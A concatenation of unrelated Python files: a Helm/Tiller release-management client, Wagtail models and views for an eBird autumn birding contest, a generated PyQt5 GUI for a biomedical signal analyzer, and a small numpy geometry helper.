install_msg.release.info.Description,
install_msg.release.version)
return tiller_result
except Exception:
LOG.exception('Error while installing release %s', release)
status = self.get_release_status(release)
raise ex.ReleaseException(release, status, 'Install')
def test_release(self,
release,
timeout=const.DEFAULT_TILLER_TIMEOUT,
cleanup=False):
'''
:param release: name of release to test
:param timeout: runtime before exiting
:param cleanup: removes testing pod created
:returns: test suite run object
'''
LOG.info("Running Helm test: release=%s, timeout=%s", release, timeout)
try:
stub = ReleaseServiceStub(self.channel)
# TODO: This timeout is redundant since we already have the grpc
# timeout below, and it's actually used by tiller for individual
# k8s operations not the overall request, should we:
# 1. Remove this timeout
# 2. Add `k8s_timeout=const.DEFAULT_K8S_TIMEOUT` arg and use
release_request = TestReleaseRequest(
name=release, timeout=timeout, cleanup=cleanup)
test_message_stream = stub.RunReleaseTest(
release_request, timeout, metadata=self.metadata)
failed = 0
for test_message in test_message_stream:
if test_message.status == test.TESTRUN_STATUS_FAILURE:
failed += 1
LOG.info(test_message.msg)
if failed:
LOG.info('{} test(s) failed'.format(failed))
status = self.get_release_status(release)
return status.info.status.last_test_suite_run
except Exception:
LOG.exception('Error while testing release %s', release)
status = self.get_release_status(release)
raise ex.ReleaseException(release, status, 'Test')
def get_release_status(self, release, version=0):
'''
:param release: name of release to test
:param version: version of release status
'''
LOG.debug('Helm getting release status for release=%s, version=%s',
release, version)
try:
stub = ReleaseServiceStub(self.channel)
status_request = GetReleaseStatusRequest(
name=release, version=version)
release_status = stub.GetReleaseStatus(
status_request, self.timeout, metadata=self.metadata)
LOG.debug('GetReleaseStatus= %s', release_status)
return release_status
except Exception:
raise ex.GetReleaseStatusException(release, version)
def get_release_content(self, release, version=0):
'''
:param release: name of release to test
:param version: version of release status
'''
LOG.debug('Helm getting release content for release=%s, version=%s',
release, version)
try:
stub = ReleaseServiceStub(self.channel)
status_request = GetReleaseContentRequest(
name=release, version=version)
release_content = stub.GetReleaseContent(
status_request, self.timeout, metadata=self.metadata)
LOG.debug('GetReleaseContent= %s', release_content)
return release_content
except Exception:
raise ex.GetReleaseContentException(release, version)
def tiller_version(self):
'''
:returns: Tiller version
'''
try:
stub = ReleaseServiceStub(self.channel)
release_request = GetVersionRequest()
LOG.debug('Getting Tiller version, with timeout=%s', self.timeout)
tiller_version = stub.GetVersion(
release_request, self.timeout, metadata=self.metadata)
tiller_version = getattr(tiller_version.Version, 'sem_ver', None)
LOG.debug('Got Tiller version %s', tiller_version)
return tiller_version
except Exception:
LOG.debug('Failed to get Tiller version')
raise ex.TillerVersionException()
def uninstall_release(self, release, disable_hooks=False, purge=True):
'''
:param: release - Helm chart release name
:param: purge - deep delete of chart
Deletes a Helm chart from Tiller
'''
# Helm client calls ReleaseContent in Delete dry-run scenario
if self.dry_run:
content = self.get_release_content(release)
LOG.info(
'Skipping delete during `dry-run`, would have deleted '
'release=%s from namespace=%s.', content.release.name,
content.release.namespace)
return
# build release uninstall request
try:
stub = ReleaseServiceStub(self.channel)
LOG.info(
"Uninstall %s release with disable_hooks=%s, "
"purge=%s flags", release, disable_hooks, purge)
release_request = UninstallReleaseRequest(
name=release, disable_hooks=disable_hooks, purge=purge)
return stub.UninstallRelease(
release_request, self.timeout, metadata=self.metadata)
except Exception:
LOG.exception('Error while uninstalling release %s', release)
status = self.get_release_status(release)
raise ex.ReleaseException(release, status, 'Delete')
def delete_resources(self,
release_name,
resource_name,
resource_type,
resource_labels,
namespace,
wait=False,
timeout=const.DEFAULT_TILLER_TIMEOUT):
'''
:param release_name: release name the specified resource is under
:param resource_name: name of specific resource
:param resource_type: type of resource e.g. job, pod, etc.
:param resource_labels: labels by which to identify the resource
:param namespace: namespace of the resource
Apply deletion logic based on type of resource
'''
timeout = self._check_timeout(wait, timeout)
label_selector = ''
if resource_labels is not None:
label_selector = label_selectors(resource_labels)
LOG.debug(
"Deleting resources in namespace %s matching "
"selectors (%s).", namespace, label_selector)
handled = False
if resource_type == 'job':
get_jobs = self.k8s.get_namespace_job(namespace, label_selector)
for jb in get_jobs.items:
jb_name = jb.metadata.name
if self.dry_run:
LOG.info(
'Skipping delete job during `dry-run`, would '
'have deleted job %s in namespace=%s.', jb_name,
namespace)
continue
LOG.info("Deleting job %s in namespace: %s", jb_name,
namespace)
self.k8s.delete_job_action(jb_name, namespace, timeout=timeout)
handled = True
if resource_type == 'cronjob' or resource_type == 'job':
get_jobs = self.k8s.get_namespace_cron_job(namespace,
label_selector)
for jb in get_jobs.items:
jb_name = jb.metadata.name
if resource_type == 'job':
# TODO: Eventually disallow this, allowing initially since
# some existing clients were expecting this behavior.
LOG.warn("Deleting cronjobs via `type: job` is "
"deprecated, use `type: cronjob` instead")
if self.dry_run:
LOG.info(
'Skipping delete cronjob during `dry-run`, would '
'have deleted cronjob %s in namespace=%s.', jb_name,
namespace)
continue
LOG.info("Deleting cronjob %s in namespace: %s", jb_name,
namespace)
self.k8s.delete_cron_job_action(jb_name, namespace)
handled = True
if resource_type == 'pod':
release_pods = self.k8s.get_namespace_pod(namespace,
label_selector)
for pod in release_pods.items:
pod_name = pod.metadata.name
if self.dry_run:
LOG.info(
'Skipping delete pod during `dry-run`, would '
'have deleted pod %s in namespace=%s.', pod_name,
namespace)
continue
LOG.info("Deleting pod %s in namespace: %s", pod_name,
namespace)
self.k8s.delete_pod_action(pod_name, namespace)
if wait:
self.k8s.wait_for_pod_redeployment(pod_name, namespace)
handled = True
if not handled:
LOG.error("Unable to execute name: %s type: %s ", resource_name,
resource_type)
def rolling_upgrade_pod_deployment(self,
name,
release_name,
namespace,
resource_labels,
action_type,
chart,
disable_hooks,
values,
timeout=const.DEFAULT_TILLER_TIMEOUT):
'''
update statefullsets (daemon, stateful)
'''
if action_type == 'daemonset':
LOG.info('Updating: %s', action_type)
label_selector = ''
if resource_labels is not None:
label_selector = label_selectors(resource_labels)
get_daemonset = self.k8s.get_namespace_daemonset(
namespace=namespace, label=label_selector)
for ds in get_daemonset.items:
ds_name = ds.metadata.name
ds_labels = ds.metadata.labels
if ds_name == name:
LOG.info("Deleting %s : %s in %s", action_type, ds_name,
namespace)
self.k8s.delete_daemon_action(ds_name, namespace)
# update the daemonset yaml
template = self.get_chart_templates(
ds_name, name, release_name, namespace, chart,
disable_hooks, values)
template['metadata']['labels'] = ds_labels
template['spec']['template']['metadata'][
'labels'] = ds_labels
self.k8s.create_daemon_action(
namespace=namespace, template=template)
# delete pods
self.delete_resources(
release_name,
name,
'pod',
resource_labels,
namespace,
wait=True,
timeout=timeout)
else:
LOG.error("Unable to exectue name: % type: %s", name, action_type)
def rollback_release(self,
release_name,
version,
wait=False,
timeout=None,
force=False,
recreate_pods=False):
'''
Rollback a helm release.
'''
timeout = self._check_timeout(wait, timeout)
LOG.debug(
'Helm rollback%s of release=%s, version=%s, '
'wait=%s, timeout=%s', (' (dry run)' if self.dry_run else ''),
release_name, version, wait, timeout)
try:
stub = ReleaseServiceStub(self.channel)
rollback_request = RollbackReleaseRequest(
name=release_name,
version=version,
dry_run=self.dry_run,
wait=wait,
timeout=timeout,
force=force,
recreate=recreate_pods)
rollback_msg = stub.RollbackRelease(
rollback_request,
timeout + GRPC_EPSILON,
metadata=self.metadata)
LOG.debug('RollbackRelease= %s', rollback_msg)
return
except Exception:
raise ex.RollbackReleaseException(release_name, version)
def _check_timeout(self, wait, timeout):
if timeout is None or timeout <= 0:
if wait:
LOG.warn(
'Tiller timeout is invalid or unspecified, '
'using default %ss.', self.timeout)
timeout = self.timeout
return timeout
|
from django.db import models
from wagtail.core.models import Page
from wagtail.core.fields import RichTextField
from wagtail.admin.edit_handlers import FieldPanel
from wagtailmenus.models import MenuPage
from django.shortcuts import render
from django.core.mail import EmailMessage
from django.template.loader import get_template
import pandas as pd
import datetime
import eb_passwords
# import datetime
class Info(Page):
info_content = RichTextField(blank=True, help_text='秋季觀鳥競賽的活動說明')
choose_team_page = models.ForeignKey( Page,null=True,blank=True, \
on_delete=models.SET_NULL,related_name='+')
prize_page = models.ForeignKey( Page,null=True,blank=True, \
on_delete=models.SET_NULL,related_name='+')
content_panels = Page.content_panels + [
FieldPanel('info_content', classname='full'),
FieldPanel('choose_team_page'),
FieldPanel('prize_page'),
]
class Reward(Page):
reward_content = RichTextField(blank=True, help_text='秋季觀鳥競賽的獎品說明')
content_panels = Page.content_panels + [
FieldPanel('reward_content', classname='full')
]
class TeamIntroduction(Page):
team_left_description = models.CharField(blank=True, max_length=100, help_text='彩鷸隊')
team_middle_description = models.CharField(blank=True, max_length=100, help_text='家燕隊')
team_right_description = models.CharField(blank=True, max_length=100, help_text='大冠鷲隊')
signup_page = models.ForeignKey( Page,null=True,blank=True, \
on_delete=models.SET_NULL,related_name='+')
content_panels = Page.content_panels + [
FieldPanel('team_left_description'),
FieldPanel('team_middle_description'),
FieldPanel('team_right_description'),
FieldPanel('signup_page')
]
class Dashboard(MenuPage):
dash_board_name = models.CharField(max_length=30, blank=False, help_text="DON'tT TOUCH this")
IsDemoApp = models.BooleanField(default=True)
brython_file_name = models.CharField(max_length=30, blank=True, help_text='page_instance_specific brython script')
content_panels = Page.content_panels + [
FieldPanel('IsDemoApp'),
FieldPanel('dash_board_name', classname='full'),
FieldPanel('brython_file_name')
]
class SignupData(models.Model):
team_choice = [
('彩鷸隊', '彩鷸隊' ),
('家燕隊', '家燕隊' ),
('大冠鷲隊', '大冠鷲隊' ),
]
ebirdid = models.CharField(max_length=50, verbose_name='ebird公開帳號')
team = models.CharField(max_length=6, choices=team_choice, default='彩鷸隊', verbose_name='隊伍名稱')
email = models.EmailField(max_length=100, verbose_name='電子信箱')
signup_time = models.DateTimeField(auto_now_add=True, editable=False, verbose_name='報名時間')
def __str__(self):
return self.ebirdid
def send_validation_email(email, team, ebirdid):
t = get_template('fall/welcome_email_complex.html')
content = t.render(locals())
msg = EmailMessage(
'歡迎加入ebirdTaiwan秋季挑戰賽',
content,
eb_passwords.mailserver_account,
[email]
)
msg.content_subtype = 'html'
try:
msg.send()
except Exception as e:
print(e)
class SignupPage(Page):
def serve(self, request):
if request.method == 'POST':
ebirdid = request.POST.get('ebirdid', None)
team = request.POST.get('team', None)
email = request.POST.get('email', None)
if (len(SignupData.objects.filter(ebirdid=ebirdid)) > 0):
render_data = locals()
render_data['page'] = self
render_data['error_message'] = '這個eBird公開顯示名稱已經註冊了!'
return render(request, 'fall/signup.html', render_data)
if (len(SignupData.objects.filter(email=email)) > 0):
render_data = locals()
render_data['page'] = self
render_data['error_message'] = '這個email註冊過了!'
return render(request, 'fall/signup.html', render_data)
send_validation_email(email = email, team = team, ebirdid = ebirdid)
'''
TODO: add email valid check before add data
'''
NewSignupData = SignupData(
ebirdid=ebirdid,
team = team,
email=email,
)
NewSignupData.save()
render_data = locals()
render_data['page'] = self
return render(request, 'fall/thankyou.html', render_data)
else:
render_data = locals()
render_data['page'] = self
return render(request, 'fall/signup.html', render_data)
class AutumnChallengePage(Page):
subtitle = RichTextField(blank=True)
rules = RichTextField(blank=True)
prizes = RichTextField(blank=True)
dash_board_name = models.CharField(max_length=30, blank=False, help_text="DON't TOUCH this")
content_panels = Page.content_panels + [
FieldPanel('subtitle'),
FieldPanel('rules', classname='full'),
FieldPanel('prizes', classname='full'),
FieldPanel('dash_board_name')
]
def serve(self, request):
recent_data20 = AutumnChanllengeData.objects.all().order_by('-survey_datetime')[:20]
df = pd.DataFrame.from_records(recent_data20.values('creator','county','survey_datetime'))[::-1]
if len(df) > 0:
peoples = df['creator'].tolist()
towns = df['county'].tolist()
upload_time = [datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S') for t in df['survey_datetime'].tolist()]
else:
peoples = []
towns = []
upload_time = []
render_data = locals()
render_data['page'] = self
return render(request, 'fall/autumn_challenge_page.html', render_data)
class PredictionData(models.Model):
participant_name = models.CharField(blank=False, max_length=40, verbose_name='參與者名稱')
participant_phone = models.CharField(max_length=30, verbose_name='聯絡電話',default='0912345678')
guess_n_species = models.IntegerField(default=0, verbose_name='幾種物種?')
guess_total_individual = models.IntegerField(default=0, verbose_name='全部幾隻?')
prediction_datetime = models.DateTimeField(auto_now=True, editable=False, verbose_name='何時進行預測')
def __str__(self):
return self.participant_name + self.participant_phone
class SubmitPrediction(Page):
def serve(self, request):
if request.method == 'POST':
name = request.POST.get('participant_name', None)
phone = request.POST.get('participant_phone', None)
gns = request.POST.get('guess_n_species', None)
gni = request.POST.get('guess_total_individual', None)
if (len(PredictionData.objects.filter(participant_phone=phone)) > 0):
render_data = locals()
render_data['page'] = self
render_data['error_message'] = '錯誤!一組電話只能進行一次預測'
return render(request, 'fall/prediction.html', render_data)
NewPredictionData = PredictionData(
participant_name = name,
participant_phone = phone,
guess_n_species = gns,
guess_total_individual = gni
)
NewPredictionData.save()
render_data = locals()
render_data['page'] = self
return render(request, 'fall/prediction_finish.html', render_data)
else:
render_data = locals()
render_data['page'] = self
return render(request, 'fall/prediction.html', render_data)
'''
Scraped data area
'''
class Survey(models.Model):
scrape_date = models.DateField(editable=False,auto_now_add=True,verbose_name='清單抓取日期')
team = models.CharField(blank=False, max_length=5, default='沒有隊',verbose_name='隊伍名稱')
checklist_id = models.CharField(blank=False, max_length=15, primary_key=True,verbose_name='清單ID')
creator = models.CharField(blank=False, max_length=30,verbose_name='清單分享來源')
survey_datetime = models.DateTimeField(blank=False, verbose_name='調查時間', null=True) #try out will set verbose name good?
latitude = models.FloatField(blank=False, default=23.5,verbose_name='緯度')
longitude = models.FloatField(blank=False, default=120.5,verbose_name='經度')
county = models.CharField(default='天國市地獄鎮',max_length=15,verbose_name='鄉鎮名稱')
is_valid = models.BooleanField(default=False,verbose_name='是否完整') #checklist不含X 大於5分鐘
def __str__(self):
return self.checklist_id
class SurveyObs(models.Model):
survey = models.ForeignKey(Survey, on_delete=models.CASCADE, verbose_name='清單ID')
species_name = models.CharField(blank=False, max_length=30, default='unKnown', verbose_name='物種名稱')
amount = models.IntegerField(blank=False, default=0, verbose_name='數量')
class AutumnChanllengeData(models.Model):
checklist_id = models.CharField(blank=False, max_length=15, primary_key=True,verbose_name='清單ID')
scrape_date = models.DateField(editable=False,auto_now_add=True,verbose_name='清單抓取日期')
survey_datetime = models.DateTimeField(editable=False,auto_now_add=False,verbose_name='調查時間')
creator = models.CharField(editable=False,blank=False, max_length=30,verbose_name='清單分享來源')
latitude = models.FloatField(default=23.5,verbose_name='緯度')
longitude = models.FloatField(default=120.5,verbose_name='經度')
county = models.CharField(default='天國市地獄鎮',max_length=15,verbose_name='鄉鎮名稱')
is_valid = models.BooleanField(editable=True,verbose_name='有鳥才算數')
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1027, 649)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setEnabled(True)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1024, 768))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.groupBox = QtWidgets.QGroupBox(self.tab)
self.groupBox.setGeometry(QtCore.QRect(0, 0, 241, 381))
self.groupBox.setObjectName("groupBox")
self.checkBox_1 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_1.setGeometry(QtCore.QRect(10, 20, 87, 20))
self.checkBox_1.setObjectName("checkBox_1")
self.checkBox_2 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_2.setGeometry(QtCore.QRect(10, 40, 87, 20))
self.checkBox_2.setObjectName("checkBox_2")
self.checkBox_3 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_3.setGeometry(QtCore.QRect(10, 60, 87, 20))
self.checkBox_3.setObjectName("checkBox_3")
self.checkBox_4 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_4.setGeometry(QtCore.QRect(10, 80, 87, 20))
self.checkBox_4.setObjectName("checkBox_4")
self.checkBox_5 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_5.setGeometry(QtCore.QRect(10, 100, 87, 20))
self.checkBox_5.setObjectName("checkBox_5")
self.checkBox_6 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_6.setGeometry(QtCore.QRect(10, 120, 87, 20))
self.checkBox_6.setObjectName("checkBox_6")
self.checkBox_7 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_7.setGeometry(QtCore.QRect(10, 140, 87, 20))
self.checkBox_7.setObjectName("checkBox_7")
self.checkBox_8 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_8.setGeometry(QtCore.QRect(10, 160, 87, 20))
self.checkBox_8.setObjectName("checkBox_8")
self.checkBox_9 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_9.setGeometry(QtCore.QRect(10, 180, 87, 20))
self.checkBox_9.setObjectName("checkBox_9")
self.checkBox_10 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_10.setGeometry(QtCore.QRect(10, 200, 87, 20))
self.checkBox_10.setObjectName("checkBox_10")
self.checkBox_11 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_11.setGeometry(QtCore.QRect(10, 220, 87, 20))
self.checkBox_11.setObjectName("checkBox_11")
self.checkBox_12 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_12.setGeometry(QtCore.QRect(10, 240, 87, 20))
self.checkBox_12.setObjectName("checkBox_12")
self.checkBox_13 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_13.setGeometry(QtCore.QRect(10, 260, 87, 20))
self.checkBox_13.setObjectName("checkBox_13")
self.checkBox_14 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_14.setGeometry(QtCore.QRect(10, 280, 87, 20))
self.checkBox_14.setObjectName("checkBox_14")
self.checkBox_15 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_15.setGeometry(QtCore.QRect(10, 300, 87, 20))
self.checkBox_15.setObjectName("checkBox_15")
self.checkBox_16 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_16.setGeometry(QtCore.QRect(10, 320, 87, 20))
self.checkBox_16.setObjectName("checkBox_16")
self.checkBox_17 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_17.setGeometry(QtCore.QRect(130, 20, 87, 20))
self.checkBox_17.setObjectName("checkBox_17")
self.checkBox_18 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_18.setGeometry(QtCore.QRect(130, 40, 87, 20))
self.checkBox_18.setObjectName("checkBox_18")
self.checkBox_19 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_19.setGeometry(QtCore.QRect(130, 60, 87, 20))
self.checkBox_19.setObjectName("checkBox_19")
self.checkBox_20 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_20.setGeometry(QtCore.QRect(130, 80, 87, 20))
self.checkBox_20.setObjectName("checkBox_20")
self.checkBox_21 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_21.setGeometry(QtCore.QRect(130, 100, 87, 20))
self.checkBox_21.setObjectName("checkBox_21")
self.checkBox_22 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_22.setGeometry(QtCore.QRect(130, 120, 87, 20))
self.checkBox_22.setObjectName("checkBox_22")
self.checkBox_23 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_23.setGeometry(QtCore.QRect(130, 140, 87, 20))
self.checkBox_23.setObjectName("checkBox_23")
self.checkBox_24 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_24.setGeometry(QtCore.QRect(130, 160, 87, 20))
self.checkBox_24.setObjectName("checkBox_24")
self.checkBox_25 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_25.setGeometry(QtCore.QRect(130, 180, 87, 20))
self.checkBox_25.setObjectName("checkBox_25")
self.checkBox_26 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_26.setGeometry(QtCore.QRect(130, 200, 87, 20))
self.checkBox_26.setObjectName("checkBox_26")
self.checkBox_27 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_27.setGeometry(QtCore.QRect(130, 220, 87, 20))
self.checkBox_27.setObjectName("checkBox_27")
self.checkBox_28 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_28.setGeometry(QtCore.QRect(130, 240, 87, 20))
self.checkBox_28.setObjectName("checkBox_28")
self.checkBox_29 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_29.setGeometry(QtCore.QRect(130, 260, 87, 20))
self.checkBox_29.setObjectName("checkBox_29")
self.checkBox_30 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_30.setGeometry(QtCore.QRect(130, 280, 87, 20))
self.checkBox_30.setObjectName("checkBox_30")
self.checkBox_31 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_31.setGeometry(QtCore.QRect(130, 300, 87, 20))
self.checkBox_31.setObjectName("checkBox_31")
self.checkBox_32 = QtWidgets.QCheckBox(self.groupBox)
self.checkBox_32.setGeometry(QtCore.QRect(130, 320, 87, 20))
self.checkBox_32.setObjectName("checkBox_32")
self.btnSelectAll = QtWidgets.QPushButton(self.groupBox)
self.btnSelectAll.setGeometry(QtCore.QRect(0, 340, 113, 32))
self.btnSelectAll.setObjectName("btnSelectAll")
self.btnSelectNone = QtWidgets.QPushButton(self.groupBox)
self.btnSelectNone.setGeometry(QtCore.QRect(120, 340, 113, 32))
self.btnSelectNone.setObjectName("btnSelectNone")
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setGeometry(QtCore.QRect(0, 0, 700, 500))
self.groupBox_2.setObjectName("groupBox_2")
self.scrollArea = QtWidgets.QScrollArea(self.groupBox_2)
self.scrollArea.setGeometry(QtCore.QRect(0, 20, 700, 480))
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 698, 478))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.btnSetTimeSeriesPlot = QtWidgets.QPushButton(self.groupBox_2)
self.btnSetTimeSeriesPlot.setGeometry(QtCore.QRect(100, 0, 161, 32))
self.btnSetTimeSeriesPlot.setObjectName("btnSetTimeSeriesPlot")
self.groupBox_3 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_3.setGeometry(QtCore.QRect(710, 0, 300, 181))
self.groupBox_3.setObjectName("groupBox_3")
self.rbDataFromFile = QtWidgets.QRadioButton(self.groupBox_3)
self.rbDataFromFile.setGeometry(QtCore.QRect(0, 20, 131, 20))
self.rbDataFromFile.setObjectName("rbDataFromFile")
self.rbRealTimeData = QtWidgets.QRadioButton(self.groupBox_3)
self.rbRealTimeData.setGeometry(QtCore.QRect(160, 20, 121, 20))
self.rbRealTimeData.setObjectName("rbRealTimeData")
self.btnLoad = QtWidgets.QPushButton(self.groupBox_3)
self.btnLoad.setGeometry(QtCore.QRect(0, 40, 90, 32))
self.btnLoad.setObjectName("btnLoad")
self.btnConn = QtWidgets.QPushButton(self.groupBox_3)
self.btnConn.setGeometry(QtCore.QRect(100, 40, 90, 32))
self.btnConn.setObjectName("btnConn")
self.btnDisconn = QtWidgets.QPushButton(self.groupBox_3)
self.btnDisconn.setGeometry(QtCore.QRect(200, 40, 90, 32))
self.btnDisconn.setObjectName("btnDisconn")
self.line = QtWidgets.QFrame(self.groupBox_3)
self.line.setGeometry(QtCore.QRect(0, 70, 301, 16))
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.groupBox_4 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_4.setGeometry(QtCore.QRect(0, 500, 700, 100))
self.groupBox_4.setObjectName("groupBox_4")
self.groupBox_5 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_5.setGeometry(QtCore.QRect(710, 180, 300, 211))
self.groupBox_5.setObjectName("groupBox_5")
self.groupBox_6 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_6.setGeometry(QtCore.QRect(710, 390, 301, 211))
self.groupBox_6.setObjectName("groupBox_6")
self.comboBox = QtWidgets.QComboBox(self.groupBox_6)
self.comboBox.setGeometry(QtCore.QRect(143, 0, 161, 26))
self.comboBox.setObjectName("comboBox")
self.tabWidget.addTab(self.tab_2, "")
self.tab_3 = QtWidgets.QWidget()
self.tab_3.setObjectName("tab_3")
self.tabWidget.addTab(self.tab_3, "")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionimport = QtWidgets.QAction(MainWindow)
self.actionimport.setObjectName("actionimport")
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "ZJU Biomedical Signal Analyzer - V0.1"))
self.groupBox.setTitle(_translate("MainWindow", "Channel Selection"))
self.checkBox_1.setText(_translate("MainWindow", "channel 01"))
self.checkBox_2.setText(_translate("MainWindow", "channel 02"))
self.checkBox_3.setText(_translate("MainWindow", "channel 03"))
self.checkBox_4.setText(_translate("MainWindow", "channel 04"))
self.checkBox_5.setText(_translate("MainWindow", "channel 05"))
self.checkBox_6.setText(_translate("MainWindow", "channel 06"))
self.checkBox_7.setText(_translate("MainWindow", "channel 07"))
self.checkBox_8.setText(_translate("MainWindow", "channel 08"))
self.checkBox_9.setText(_translate("MainWindow", "channel 09"))
self.checkBox_10.setText(_translate("MainWindow", "channel 10"))
self.checkBox_11.setText(_translate("MainWindow", "channel 11"))
self.checkBox_12.setText(_translate("MainWindow", "channel 12"))
self.checkBox_13.setText(_translate("MainWindow", "channel 13"))
self.checkBox_14.setText(_translate("MainWindow", "channel 14"))
self.checkBox_15.setText(_translate("MainWindow", "channel 15"))
self.checkBox_16.setText(_translate("MainWindow", "channel 16"))
self.checkBox_17.setText(_translate("MainWindow", "channel 17"))
self.checkBox_18.setText(_translate("MainWindow", "channel 18"))
self.checkBox_19.setText(_translate("MainWindow", "channel 19"))
self.checkBox_20.setText(_translate("MainWindow", "channel 20"))
self.checkBox_21.setText(_translate("MainWindow", "channel 21"))
self.checkBox_22.setText(_translate("MainWindow", "channel 22"))
self.checkBox_23.setText(_translate("MainWindow", "channel 23"))
self.checkBox_24.setText(_translate("MainWindow", "channel 24"))
self.checkBox_25.setText(_translate("MainWindow", "channel 25"))
self.checkBox_26.setText(_translate("MainWindow", "channel 26"))
self.checkBox_27.setText(_translate("MainWindow", "channel 27"))
self.checkBox_28.setText(_translate("MainWindow", "channel 28"))
self.checkBox_29.setText(_translate("MainWindow", "channel 29"))
self.checkBox_30.setText(_translate("MainWindow", "channel 30"))
self.checkBox_31.setText(_translate("MainWindow", "channel 31"))
self.checkBox_32.setText(_translate("MainWindow", "channel 32"))
self.btnSelectAll.setText(_translate("MainWindow", "Select All"))
self.btnSelectNone.setText(_translate("MainWindow", "Select None"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Setup"))
self.groupBox_2.setTitle(_translate("MainWindow", "Time Series Plot"))
self.btnSetTimeSeriesPlot.setText(_translate("MainWindow", "Refresh Plot Setup"))
self.groupBox_3.setTitle(_translate("MainWindow", "Plot Setup"))
self.rbDataFromFile.setText(_translate("MainWindow", "Data From File"))
self.rbRealTimeData.setText(_translate("MainWindow", "Real Time Data"))
self.btnLoad.setText(_translate("MainWindow", "Load..."))
self.btnConn.setText(_translate("MainWindow", "Connect"))
self.btnDisconn.setText(_translate("MainWindow", "Disconnect"))
self.groupBox_4.setTitle(_translate("MainWindow", "Extracted Features"))
self.groupBox_5.setTitle(_translate("MainWindow", "FFT Plot"))
self.groupBox_6.setTitle(_translate("MainWindow", "Features Plot"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Plot"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate("MainWindow", "Analyze"))
self.actionimport.setText(_translate("MainWindow", "import"))
|
import numpy as np
def line_segments_from_homogeneous(lines, bbox):
x,y,w,h = bbox
# Corner points
A = np.array([x,y,1])
B = np.array([x+w,y,1])
C = np.array([x+w,y+h,1])
D = np.array([x,y+h,1])
# Cross product of pairs of corner points
edges = [
np.cross(a,b) for a,b in [[A,B],[B,C],[C,D],[D,A]]
]
# Cross product of line params with edges
intersections = [
np.cross(lines, e) for e in edges
]
# Normalize
normalized = [
p[:,:2] / p[:,-1].reshape(-1,1) for p in intersections
]
X = []
Y = []
for p in zip(*normalized):
P = []
for (u,v) in p:
if (x <= u <= x+w) and (y <= v <= y+h):
P.append( (u,v) )
if len(P) == 2:
(x0,y0), (x1,y1) = P
X.append( (x0,x1) )
Y.append( (y0,y1) )
else:
X.append(None)
Y.append(None)
return X, Y |
# Copyright 2015 Oursky Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
